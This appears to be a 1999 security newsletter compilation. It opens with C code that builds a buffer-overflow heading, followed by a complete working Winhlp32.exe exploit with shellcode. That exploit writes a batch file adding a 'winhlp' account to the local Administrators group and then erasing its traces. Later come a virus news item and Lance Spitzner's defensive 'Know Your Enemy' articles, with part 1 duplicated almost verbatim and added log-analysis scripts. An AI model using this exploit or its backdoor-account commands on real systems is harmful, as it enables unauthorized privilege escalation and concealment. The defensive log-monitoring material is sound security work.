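long find_jmp_esp(const unsigned char *buf, size_t len)
{
    size_t i;
    for (i = 0; i + 1 < len; i++)
        if (buf[i] == 0xFF && buf[i + 1] == 0xE4)
            return (long)i;
    return -1;
}

/* 1 if any of the four bytes of v is zero, else 0. */
int has_null_byte(uint32_t v)
{
    int i;
    for (i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xFF) == 0)
            return 1;
    return 0;
}

/* Byte i (0 = least significant) of v: the order the bytes must be written in
 * so the CPU reads v back as a little-endian 32-bit address. */
unsigned char le32_byte(uint32_t v, int i)
{
    return (unsigned char)((v >> (8 * i)) & 0xFF);
}

/* The advisory's trick for an address containing a zero byte:
 *     mov edx,0xFFFFFFFF ; sub edx,k        with k = 0xFFFFFFFF - target
 * leaves target in edx without a zero byte in the instruction stream.
 * Returns k, or 0 if k would itself contain a zero byte. */
uint32_t null_free_subtrahend(uint32_t target)
{
    uint32_t k = 0xFFFFFFFFu - target;
    return has_null_byte(k) ? 0 : k;
}

/* Assemble heading = filler | return address | NOP sled | code and enforce the
 * constraints: at most 507 bytes, and no zero byte anywhere, because the .cnt
 * heading is handled as a string and a zero byte would cut it short.
 * Returns the heading length, or -1 if a constraint is violated. */
int build_heading(unsigned char *out, size_t outsz, uint32_t ret_addr,
                  const unsigned char *code, size_t codelen, size_t sled)
{
    size_t total = RET_OFFSET + 4 + sled + codelen, i;
    if (total > MAX_HEADING || total > outsz || has_null_byte(ret_addr))
        return -1;
    memset(out, 'A', RET_OFFSET);
    for (i = 0; i < 4; i++)
        out[RET_OFFSET + i] = le32_byte(ret_addr, (int)i);
    memset(out + RET_OFFSET + 4, 0x90, sled);
    memcpy(out + RET_OFFSET + 4 + sled, code, codelen);
    for (i = 0; i < total; i++)
        if (out[i] == 0)
            return -1;
    return (int)total;
}

/* Constructed stand-in for a few bytes of a DLL image (push ebp; mov ebp,esp;
 * jmp esp; ret). Not taken from any real binary. */
const unsigned char sample_image[] = { 0x55, 0x8B, 0xEC, 0xFF, 0xE4, 0xC3 };

/* Demo with the advisory's figures: JMP ESP at 0x77F327E5, a 20-byte sled and
 * 107 bytes of code, i.e. the 127 usable bytes the advisory arrives at. The
 * code is 0xCC (int3) filler standing in for real shellcode. */
unsigned char demo_heading[MAX_HEADING];

int build_demo_heading(void)
{
    unsigned char code[107];
    memset(code, 0xCC, sizeof code);
    return build_heading(demo_heading, sizeof demo_heading, 0x77F327E5u,
                         code, sizeof code, 20);
}

int main(void)
{
    int n = build_demo_heading();
    printf("heading length %d bytes; code starts at byte %d\n", n, RET_OFFSET + 5);
    printf("bytes 357-360: %02X %02X %02X %02X\n", demo_heading[356],
           demo_heading[357], demo_heading[358], demo_heading[359]);
    printf("exit() at 0x78005BBA has a zero byte: use 0xFFFFFFFF - 0x%08lX\n",
           (unsigned long)null_free_subtrahend(0x78005BBAu));
    printf("JMP ESP at offset %ld of the sample image\n",
           find_jmp_esp(sample_image, sizeof sample_image));
    return 0;
}
```

It compiles with any C compiler and needs no Windows headers. On a real target the buffer handed to find_jmp_esp would be the mapped kernel32.dll image with the returned offset added to its base; the same scan with a different opcode pair (FF D4 for CALL ESP) finds the equivalent trampoline when JMP ESP is absent.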
Cheers,
David Litchfield
http://www.infowar.co.uk/mnemonix
http://www.arca.com

    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        /* JMP ESP in the Service Pack 4 kernel32.dll, 0x77F327E5, little-endian */
        char eip[5] = "\xE5\x27\xF3\x77";

        /* 20-byte NOP sled, then the three procedures assembled above */
        char ExploitCode[200] =
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            /* LoadLibraryA("MSVCRT.DLL") via 0x77F1381A */
            "\x55\x8B\xEC\x33\xC0\x50\x50\x50"
            "\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43"
            "\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44"
            "\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C"
            "\xBA\x1A\x38\xF1\x77\x52\x8D\x45\xF4\x50\xFF\x55\xF0"
            /* system("ADD") via 0x77A0E1E1 */
            "\x55\x8B\xEC\x33\xFF\x57"
            "\xC6\x45\xFC\x41\xC6\x45\xFD\x44\xC6\x45\xFE\x44"
            "\xB8\xE1\xE1\xA0\x77\x50\x8D\x45\xFC\x50\xFF\x55\xF8"
            /* exit(0) via 0x779F5BBA */
            "\x55\x8B\xEC\xBA\xBA\x5B\x9F\x77\x52\x33\xC0\x50\xFF\x55\xFC";
        FILE *fd;
        int i;

        printf("\n\n*******************************************************\n");
        printf("* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n");
        printf("* This version runs on Service Pack 4 machines and    *\n");
        printf("* assumes a msvcrt.dll version of 4.00.6201           *\n");
        printf("*                                                     *\n");
        printf("* (C) David Litchfield (mnemonix@globalnet.co.uk) '99 *\n");
        printf("*******************************************************\n\n");

        fd = fopen("wordpad.cnt", "r");
        if (fd == NULL) {
            printf("\n\nWordpad.cnt not found or insufficient rights to access it.\n"
                   "Run this from the WINNT\\HELP directory");
            return 0;
        }
        fclose(fd);

        printf("\nMaking a copy of real wordpad.cnt - wordpad.sav\n");
        system("copy wordpad.cnt wordpad.sav");

        printf("\n\nCreating wordpad.cnt with exploit code...");
        fd = fopen("wordpad.cnt", "w+");
        if (fd == NULL) {
            printf("Failed to open wordpad.cnt in write mode. Check you have sufficient rights\n");
            return 0;
        }
        /* Heading: 356 bytes of filler so that eip lands on bytes 357-360,
         * then the NOP sled and exploit code from byte 361 onwards */
        fprintf(fd, "1 ");
        for (i = 0; i < 356; i++)
            fputc('A', fd);
        fprintf(fd, "%s%s\n", eip, ExploitCode);
        fprintf(fd, "2 Opening a document=WRIPAD_OPEN_DOC\n");
        fclose(fd);

        printf("\nCreating batch file add.bat\n\n");
        fd = fopen("add.bat", "w");
        if (fd == NULL) {
            printf("Couldn't create batch file. Manually create one instead");
            return 0;
        }
        printf("The batch file will attempt to create a user account called \"winhlp\" and\n");
        printf("with a password of \"winhlp!!\" and add it to the Local Administrators group.\n");
        printf("Once this is done it will reset the files and delete itself.\n");
        fprintf(fd, "net user winhlp winhlp!! /add\n");
        fprintf(fd, "net localgroup administrators winhlp /add\n");
        fprintf(fd, "del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n");
        fprintf(fd, "del wordpad.sav\n");
        fprintf(fd, "del add.bat\n");
        fclose(fd);
        printf("\nBatch file created.");
        printf("\n\nCreated. Now open up Wordpad and click on Help\n");
        return 0;
    }

@HWA

09.0 NAI ON GALADRIEL VIRUS
~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by BHZ, Saturday 22nd May 1999 on 12.18 pm CET

A couple of days ago we wrote about the Galadriel virus. This virus infects files with the CSC extension when an infected script is run from CorelDraw or Corel Photo Paint 7, 8 or 9. A user is likely to notice the presence of the virus because many scripts stop executing properly when infected and a CorelDraw error message appears. The CSC/CSV.A virus does not work under the WordPerfect suite, as that suite uses a different scripting language from Corel Script.
NAI categorized this virus as low risk, and you can update VirusScan with these patches: VirusScan 3 & VirusScan 4.0

@HWA

10.0 Know your enemy parts 1,2 and 3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Part 1

The Attack of the Script Kiddie
Know Your Enemy
Lance Spitzner
Last Modified: May 23, 1999

My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy is. This military doctrine readily applies to the world of network security. Just like the military, you have resources that you are trying to protect. To help protect these resources, you need to know who your threat is and how they are going to attack. This article does just that: it discusses the methodology and tools used by one of the most common and universal threats, the Script Kiddie.

Who is the Script Kiddie

The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company. Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Sooner or later they find someone vulnerable. Some of them are advanced users who develop their own tools and leave behind sophisticated backdoors. Others have no idea what they are doing and only know how to type "go" at the command prompt. Regardless of their skill level, they all share a common strategy: randomly search for a specific weakness, then exploit that weakness.

The Threat

It is this random selection of targets that makes the script kiddie such a dangerous threat. Sooner or later your systems and networks will be probed; you cannot hide from them. I know of admins who were amazed to have their systems scanned when they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems were scanned by a script kiddie who happened to be sweeping that network block.
If this were limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed; anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us. With so many users on the Internet using these tools, it is no longer a question of if, but when, you will be probed. This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very systems that the script kiddies are searching for: the unprotected system that is easy to exploit, the easy kill.

The Methodology

The script kiddie methodology is a simple one. Scan the Internet for a specific weakness; when you find it, exploit it. Most of the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First, develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability. For example, let's say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP addresses is built, the user would want to determine which systems were running Linux. Many scanners today, such as Fyodor's nmap, can easily determine this by sending malformed packets to a system and seeing how it responds.
Then, tools would be used to determine which Linux systems were running imap. All that is left now is to exploit those vulnerable systems. You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are not monitoring their systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single system they can exploit. Once they have exploited a system, they use it as a launching pad. They can boldly scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held liable. Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user develops a database of which ports are open on reachable Linux systems. The user built this database to exploit the current imap vulnerability. However, let's say that a month from now a new Linux exploit is identified on a different port. Instead of having to build a new database (which is the most time consuming part), the user can quickly review his archived database and compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been scanned recently does not mean you are secure. The more sophisticated blackhats install trojans and backdoors once they compromise a system. Backdoors allow easy and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show up in any of the logs, system processes, or file structure. He builds a comfortable and safe home from which he can blatantly scan the Internet. For more information on this, check out Know Your Enemy: III. These attacks are not limited to a certain time of the day.
Many admins search their log entries for probes that happen late at night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24 hours a day, you have no idea when the probe will happen. Also, these attacks are launched from throughout the world. Just as the Internet knows no geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you.

The Tools

The tools used are extremely simple to use. Most are limited to a single purpose with few options. First come the tools used to build an IP database. These tools are truly random, as they indiscriminately scan the Internet. For example, one tool has a single option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tool builds an IP database by conducting zone transfers of the domain name and all sub-domains. Users have built databases with over 2 million IPs by scanning the entire .com or .edu domain. Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, the operating system, or the services running on the system. Once the vulnerable systems have been identified, the blackhat strikes. Several tools exist that combine all these features together, simplifying the process even further, such as sscan by jsbach. For a better understanding of how these tools are used, check out Know Your Enemy: II.

How to Protect Against This Threat

There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill; they are looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the Bugtraq mailing list is one of the best sources of information.
Another way to protect yourself is run only the services you need. If you do not need a service, turn it off. If you do need a service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris , Armoring Linux or Armoring NT. As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can find at http://www.isc.org/bind.html. Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the threats to your network and react to these threats. Conclusion The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value. Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems against this threat. NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article Author's bio Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net . Whitepapers / Publications The Attack of the Script Kiddie Know Your Enemy Lance Spitzner Last Modified: May 23, 1999 My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy is. This military doctrine readily applies to the world of network security. Just like the military, you have resources that you are trying to protect. To help protect these resources, you need to know who your threat is and how they are going to attack. 
This article does just that, it discusses the methodology and tools used by one of the most common and universal threats, the Script Kiddie. Who is the Script Kiddie The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company. Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Sooner or later they find someone vulnerable. Some of them are advance users who develop their own tools and leave behind sophisticated backdoors. Others have no idea what they are doing and only know how to type "go" at the command prompt. Regardless of the their skill level, they all share a common strategy, randomly search for a specific weakness, then exploit that weakness. The Threat It is this random selection of targets that make the script kiddie such a dangerous threat. Sooner or later your systems and networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems were scanned by a script kiddie who happened to be sweeping that network block. If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed, anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us. With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed. 
This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill. The Methodology The script kiddie methodology is a simple one. Scan the Internet for a specific weakness, when you find it, exploit it. Most of the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First, develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability. For example, lets say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems. You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are not monitoring there systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single system they can exploit. Once they have exploited a system, they now use this systems as a launching pad. They can boldly scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held liable. 
Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current imap vulnerability. However, lets say that a month from now a new Linux exploit is identified on a different port. Instead of having to build a new database (which is the most time consuming part), the user can quickly review his archived database and compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been scanned recently does not mean you are secure. The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan the Internet. For more information on this, check out Know Your Enemy: III. These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you. The Tools The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to build an IP database. These tools are truly random, as they indiscriminently scan the Internet. 
For example, one tool has a single option: A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tool builds an IP database by conducting zone transfers of the domain name and all its sub-domains. Users have built databases with over 2 million IPs by scanning the entire .com or .edu domain. Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, the operating system, or the services running on the system. Once the vulnerable systems have been identified, the blackhat strikes. Several tools exist that combine all these features together, simplifying the process even further, such as sscan by jsbach. For a better understanding of how these tools are used, check out Know Your Enemy: II.

How to Protect Against This Threat

There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill; they are looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is one of the best sources of information. Another way to protect yourself is to run only the services you need. If you do not need a service, turn it off. If you do need a service, make sure it is the latest version. For examples of how to do this, check out Armoring Solaris, Armoring Linux or Armoring NT. As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit the systems that can conduct zone transfers from your name servers. Log any unauthorized zone transfers and follow up on them.
I highly recommend upgrading to the latest version of BIND (the software used for Domain Name Service), which you can find at http://www.isc.org/bind.html. Last, watch for your systems being probed. Once identified, you can track these probes, gain a better understanding of the threats to your network, and react to them.

Conclusion

The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value. Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems against this threat.

NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article.

Author's bio

Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net.

Part 2 Tracking their moves

Know Your Enemy: II
Lance Spitzner
Last Modified: May 23, 1999

In the first article, Know Your Enemy, we covered the tools and methodologies of the script kiddie; specifically, how they probe for vulnerabilities and then attack. Now we will cover how to track their movements. Just as in the military, you want to track the bad guys and know what they are doing. We will cover what you can, and cannot, determine from your system logs. You may be able to determine if you are being probed, what you were being probed for, what tools were used, and if they were successful. The examples provided here focus on Linux, but can apply to almost any flavor of Unix. Keep in mind, there is no guaranteed way to track the enemy's every step. However, this article is a good place to start.

Securing Your Logs

This article is not on intrusion detection; there are a variety of excellent sources that cover IDS. If you are interested in intrusion detection, I recommend checking out applications such as Network Flight Recorder or swatch.
This article focuses on intelligence gathering; specifically, how to figure out what the enemy is doing by reviewing your system logs. You will be surprised how much information you will find in your own log files. However, before we can talk about reviewing your logs, we first have to discuss securing your system logs. Your log files are worthless if you cannot trust their integrity. The first thing most blackhats do is alter log files on a compromised system. There are a variety of rootkits that will wipe out their presence from log files (such as cloak), or alter logging altogether (such as trojaned syslogd binaries). So, the first step to reviewing your logs is securing your logs. This means you will need to use a remote log server. Regardless of how secure your system is, you cannot trust the logs on a compromised system. If nothing else, the blackhat can simply do an rm -rf /* on your system, wiping your hard drive clean. This makes recovering your logs somewhat difficult.

To protect against this, you will want all your systems to log both locally and to a remote log server. I recommend making your log server a dedicated system, i.e. the only thing it should be doing is collecting logs from other systems. If money is an issue, you can easily build a Linux box to act as your log server. This server should be highly secured, with all services shut off, allowing only console access (see Armoring Linux for an example). Also, ensure that port 514 UDP is blocked or firewalled at your Internet connection. This protects your log server from receiving bad or unauthorized logging information from the Internet. Keep in mind that classic syslog over UDP is neither authenticated nor reliable: anyone who can reach port 514 on the log server can forge entries for any host, so restrict senders to your own systems, not just the Internet side.

For those of you who like to get sneaky, something I like to do is recompile syslogd to read a different configuration file, such as /var/tmp/.conf. This way the blackhat does not realize where the real configuration file is. This is simply done by changing the entry "/etc/syslog.conf" in the source code to whatever file you want.
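Because the copy on the remote log server is the one you trust, the useful check on a suspect host is to compare its local log with what the log server received from it. The following is an added example (my code, not part of Spitzner's article) of that comparison: the remote copy is the reference, and every entry that has disappeared from the local file is reported, which is exactly what a log cleaner such as cloak leaves behind. Local-only entries are reported too, since a dropped UDP packet and a forged local entry look the same until you look. The two log excerpts are constructed in the article's format; the hostname mozart is borrowed from its examples.

```python
#!/usr/bin/env python3
"""Compare a host's local syslog file with the remote log server's copy.

Added example, not part of the original article. The remote log server
is treated as the trusted reference: anything present there but missing
from the local file was removed or rewritten on the host. Extra
local-only lines are reported as well.
"""
from collections import Counter

# Constructed sample: what the log server received from host "mozart"
# (the server's file also carries lines from other hosts).
REMOTE_LOG = """\
Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200
Apr 14 21:20:51 bach in.fingerd[2231]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200
Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown
Apr 14 21:30:01 mozart PAM_pwdb[11800]: (login) session opened for user crak0 by (uid=0)
"""

# Constructed sample: the same file as found on mozart after a log
# cleaner ran. The rlogind line and the crak0 login are gone.
LOCAL_LOG = """\
Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200
Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown
"""


def lines_for_host(text, host):
    """Return the log lines whose hostname field equals `host`.

    Syslog lines look like 'Mon DD HH:MM:SS host program[pid]: message',
    so the hostname is the fourth whitespace-separated field.
    """
    out = []
    for line in text.splitlines():
        fields = line.split(None, 4)
        if len(fields) >= 4 and fields[3] == host:
            out.append(line.rstrip())
    return out


def compare_logs(remote_text, local_text, host):
    """Return (missing_locally, extra_locally) as sorted lists of lines.

    Counters rather than sets, so a message that was legitimately logged
    twice and now appears once is still flagged.
    """
    remote = Counter(lines_for_host(remote_text, host))
    local = Counter(lines_for_host(local_text, host))
    missing = sorted((remote - local).elements())
    extra = sorted((local - remote).elements())
    return missing, extra


if __name__ == "__main__":
    missing, extra = compare_logs(REMOTE_LOG, LOCAL_LOG, "mozart")
    if not missing and not extra:
        print("local log matches the log server copy")
    for line in missing:
        print("MISSING LOCALLY:", line)
    for line in extra:
        print("LOCAL ONLY     :", line)
```

In practice read the two files from disk and run the comparison from the log server, never from the suspect host. If your log server rewrites the timestamp on arrival (some syslogd builds do), compare on the text after the timestamp instead of the whole line, or you will get a false "missing" for every entry.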
We then set up our new configuration file to log both locally and to the remote log server (see example). Make sure you maintain a standard copy of the configuration file, /etc/syslog.conf, which points to all local logging. Even though this configuration file is now unused, it will keep the blackhat from realizing the true destination of our remote logging.

Another option for your systems is to use a more secure method of logging: replace your syslogd binary with something that has integrity checking and a greater breadth of options, such as syslog-ng, which you can find at http://www.balabit.hu/products/syslog-ng.html

Most of the logs we will use are the ones stored on the remote log server. As mentioned earlier, we can be fairly confident of the integrity of these logs since they are on a remote and secured system. Also, since all systems are logging to a single source, it is much easier to identify patterns in these logs. We can quickly review what's happening to all the systems in one place. The only time you would want to review logs stored locally on a system is to compare them to what the log server has. You can determine if the local logs have been altered by comparing them to the remote logs.

Pattern Matching

By looking at your log entries, you can usually determine if you are being port scanned. Most script kiddies scan a network for a single vulnerability. If your logs show most of your systems being connected to from the same remote system, on the same port, this is most likely an exploit scan. Basically, the enemy has an exploit for a single vulnerability, and they are scanning your network for it. When they find it, they exploit it. For most Linux systems, TCP Wrappers is installed by default, so we would find most of these connections in /var/log/secure. For other flavors of Unix, we can log all inetd connections by launching inetd with the "-t" flag, which logs to the daemon facility. A typical exploit scan would look something like the one below.
Here we have a source scanning for the wu-ftpd vulnerability.

/var/log/secure
Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200

Here we see the source 192.168.11.200 scanning our network. Notice how the source sequentially scans each IP (this is not always the case). This is the advantage of having a log server: you can more easily identify patterns in your network since all the logs are combined. The repeated connections to port 21, ftp, indicate they were most likely looking for the wu-ftpd exploit. We have just determined what the blackhat is looking for. Often, scans tend to come in phases. Someone will release code for an imap exploit, and you will suddenly see a rush of imap scans in your logs. The next month you will be hit by ftp. An excellent source for current exploits is http://www.cert.org/advisories/

Sometimes, tools will scan for a variety of exploits at the same time, so you may see a single source connecting to several ports. Keep in mind, if you are not logging the service, you will not know if you are scanned for it. For example, most rpc connections are not logged. However, many services can simply be added to /etc/inetd.conf for logging with TCP Wrappers. For example, you can add an entry in /etc/inetd.conf for NetBus. You can then configure TCP Wrappers to safely deny and log the connections (see Intrusion Detection for more info on this).

What's the Tool?

Sometimes you can actually determine the tools being used to scan your network. Some of the more basic tools scan for a specific exploit, such as ftp-scan.c. If only a single port or vulnerability is being probed on your network, they are most likely using one of these "single mission" tools.
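The two patterns just described, one source hitting the same daemon on many hosts (a single-exploit sweep) and one source hitting many daemons on one host (a tool that probes for several exploits at once), are easy to pull out of a log server's combined /var/log/secure automatically. Here is an added example (my code, not the article's) that does so over TCP Wrappers "connect from" entries. The sample entries are constructed in the article's format, with its hostnames and the 192.168.11.200 source; the thresholds and the second source address are my assumptions.

```python
#!/usr/bin/env python3
"""Classify probe activity from TCP Wrappers 'connect from' entries.

Added example, not part of the original article. Over a log server's
combined /var/log/secure it reports, per source address:

  * single-exploit sweep: one daemon contacted on many hosts
  * multi-vulnerability probe: many daemons contacted on one host
"""
import re
from collections import defaultdict

# 'Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200'
WRAPPER_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d+)\s+(?P<time>\d\d:\d\d:\d\d)\s+"
    r"(?P<host>\S+)\s+(?P<daemon>[\w.-]+)\[\d+\]:\s+connect from\s+(?P<src>\S+)"
)

# Constructed sample in the article's format (second source is invented).
SAMPLE_SECURE = """\
Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:54 haydn in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 10.1.2.3
Apr 14 19:18:56 mozart imapd[11635]: connect from 10.1.2.3
Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 10.1.2.3
Apr 14 19:18:56 mozart ipop3d[11638]: connect from 10.1.2.3
Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 10.1.2.3
Apr 14 20:02:11 bach in.telnetd[11702]: connect from 172.16.1.5
Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown
"""

# Thresholds are assumptions for the example; tune to your network size.
SWEEP_MIN_HOSTS = 3      # same daemon contacted on at least this many hosts
PROBE_MIN_DAEMONS = 4    # at least this many daemons contacted on one host


def parse_connects(text):
    """Yield (host, daemon, src) for every TCP Wrappers connect line.

    'connect from unknown' carries no usable source and is skipped here;
    it is still worth counting on its own as a half-open scan indicator.
    """
    for line in text.splitlines():
        m = WRAPPER_RE.match(line)
        if m and m.group("src") != "unknown":
            yield m.group("host"), m.group("daemon"), m.group("src")


def classify_sources(text):
    """Return {src: [finding, ...]} based on host/daemon spread."""
    hosts_by_daemon = defaultdict(lambda: defaultdict(set))  # src -> daemon -> hosts
    daemons_by_host = defaultdict(lambda: defaultdict(set))  # src -> host -> daemons
    for host, daemon, src in parse_connects(text):
        hosts_by_daemon[src][daemon].add(host)
        daemons_by_host[src][host].add(daemon)

    findings = defaultdict(list)
    for src, per_daemon in hosts_by_daemon.items():
        for daemon, hosts in sorted(per_daemon.items()):
            if len(hosts) >= SWEEP_MIN_HOSTS:
                findings[src].append(
                    "single-exploit sweep: %s on %d hosts (%s)"
                    % (daemon, len(hosts), ", ".join(sorted(hosts))))
    for src, per_host in daemons_by_host.items():
        for host, daemons in sorted(per_host.items()):
            if len(daemons) >= PROBE_MIN_DAEMONS:
                findings[src].append(
                    "multi-vulnerability probe of %s: %s"
                    % (host, ", ".join(sorted(daemons))))
    return dict(findings)


if __name__ == "__main__":
    for src, notes in sorted(classify_sources(SAMPLE_SECURE).items()):
        for note in notes:
            print(src, "->", note)
```

Feed it the log server's file rather than any one host's copy; the sweep pattern is invisible from a single machine, which is the article's point about centralised logging. Remember that it only sees daemons wrapped by TCP Wrappers, so an rpc sweep will not show up unless you have arranged for those connections to be logged.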
However, there exist tools that probe for a variety of vulnerabilities or weaknesses; the two most popular are sscan by jsbach and nmap by Fyodor. I've selected these two tools because they represent the two "categories" of scanning tools. I highly recommend you run these tools against your own network; you may be surprised by the results :)

